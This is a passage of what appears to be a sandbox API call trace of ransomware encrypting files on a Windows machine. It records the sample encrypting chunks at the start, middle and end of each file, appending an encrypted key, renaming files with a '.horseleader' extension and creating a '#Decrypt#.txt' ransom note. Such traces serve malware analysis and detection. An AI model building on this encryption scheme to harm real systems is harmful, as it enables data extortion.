returned 1 [0168.131] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0168.131] lstrlenW (lpString=".testttjffg") returned 11 [0168.131] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0168.131] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.131] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0168.131] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.132] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf00dbad0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf58c8770, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf58c8770, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0168.132] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0168.132] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..") returned 69 [0168.132] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0168.132] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0168.132] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0168.132] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0168.132] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0168.132] lstrlenW (lpString=".testttjffg") returned 11 [0168.132] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0168.132] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0168.133] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0168.133] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0168.133] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Proof.en", cAlternateFileName="")) returned 1 [0168.133] lstrcmpiW (lpString1="Proof.en", lpString2="Windows") returned -1 [0168.133] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en") returned 75 [0168.133] lstrcmpW (lpString1="Proof.en", lpString2=".") returned 1 [0168.133] lstrcmpW (lpString1="Proof.en", lpString2="..") returned 1 [0168.133] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0168.133] GetProcessHeap () returned 0x780000 [0168.133] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d7fd8 [0168.133] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*") returned 77 [0168.133] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName=".", cAlternateFileName="")) returned 0x7c6860 [0168.134] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\.") returned 77 [0168.134] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0168.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf01c0310, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf07b3a10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf07b3a10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="..", cAlternateFileName="")) returned 1 [0168.134] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\..") returned 78 [0168.134] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0168.134] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0168.134] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf07b1ad0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xaf35ed, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.cab", cAlternateFileName="")) returned 1 [0168.134] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0168.134] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0168.135] StrStrIW (lpFirst="Proof.cab", lpSrch=".horseleader") returned 0x0 [0168.135] lstrcmpW (lpString1="Proof.cab", lpString2="#Decrypt#.txt") returned 1 [0168.135] lstrcmpW (lpString1="Proof.cab", lpString2="_uninstalling_.png") returned 1 [0168.135] lstrlenW (lpString=".testttjffg") returned 11 [0168.135] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpSrch=".testttjffg") returned 0x0 [0168.135] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0168.135] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0168.135] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0168.136] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab") returned 85 [0168.136] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0168.136] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=11482605) returned 1 [0168.137] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.190] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.190] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.191] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x5772f6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.191] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.198] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.198] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xaee5ed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.198] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0168.314] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0168.314] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0168.314] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0168.315] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0168.315] CloseHandle (hObject=0x158) returned 1 [0171.510] GetProcessHeap () returned 0x780000 [0171.510] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0171.510] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.horseleader") returned 97 [0171.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab.horseleader")) returned 1 [0171.511] GetProcessHeap () returned 0x780000 [0171.511] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0171.512] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4db6cb00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x4db6cb00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf020c5d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd5c00, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.msi", cAlternateFileName="")) returned 1 [0171.512] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0171.512] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0171.512] StrStrIW (lpFirst="Proof.msi", lpSrch=".horseleader") returned 0x0 [0171.512] lstrcmpW (lpString1="Proof.msi", lpString2="#Decrypt#.txt") returned 1 [0171.512] lstrcmpW (lpString1="Proof.msi", lpString2="_uninstalling_.png") returned 1 [0171.512] lstrlenW (lpString=".testttjffg") returned 11 [0171.512] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpSrch=".testttjffg") returned 0x0 [0171.512] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0171.513] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0171.513] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0171.513] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi") returned 85 [0171.513] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0171.513] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=875520) returned 1 [0171.513] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0171.514] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.391] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.391] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.392] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x68600, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.532] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.591] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.591] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.592] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xd0c00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.592] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.691] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.691] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0172.709] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.726] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0172.735] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0172.735] CloseHandle (hObject=0x158) returned 1 [0172.901] GetProcessHeap () returned 0x780000 [0172.902] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0172.902] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.horseleader") returned 97 [0172.902] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.msi.horseleader")) returned 1 [0172.903] GetProcessHeap () returned 0x780000 [0172.903] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0172.903] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 1 [0172.903] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0172.903] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0172.903] StrStrIW (lpFirst="Proof.xml", lpSrch=".horseleader") returned 0x0 [0172.903] lstrcmpW (lpString1="Proof.xml", lpString2="#Decrypt#.txt") returned 1 [0172.903] lstrcmpW (lpString1="Proof.xml", lpString2="_uninstalling_.png") returned 1 [0172.904] lstrlenW (lpString=".testttjffg") returned 11 [0172.904] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpSrch=".testttjffg") returned 0x0 [0172.904] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0172.904] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0172.904] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0172.904] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0172.905] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0172.905] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1347) returned 1 [0172.905] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x543, lpOverlapped=0x0) returned 1 [0172.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0172.995] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x543, lpOverlapped=0x0) returned 1 [0172.995] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.995] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0172.996] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0172.996] CloseHandle (hObject=0x158) returned 1 [0173.000] GetProcessHeap () returned 0x780000 [0173.000] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9828 [0173.001] wnsprintfW (in: pszDest=0x7d9828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.horseleader") returned 97 [0173.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.horseleader")) returned 1 [0173.004] GetProcessHeap () returned 0x780000 [0173.004] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9828 | out: hHeap=0x780000) returned 1 [0173.004] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa38b7300, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xa38b7300, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0xf01be3d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x543, dwReserved0=0x2f31e97f, dwReserved1=0x7d9f94d6, cFileName="Proof.xml", cAlternateFileName="")) returned 0 [0173.004] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0173.004] wnsprintfW (in: pszDest=0x7d7fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\#Decrypt#.txt") returned 89 [0173.005] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 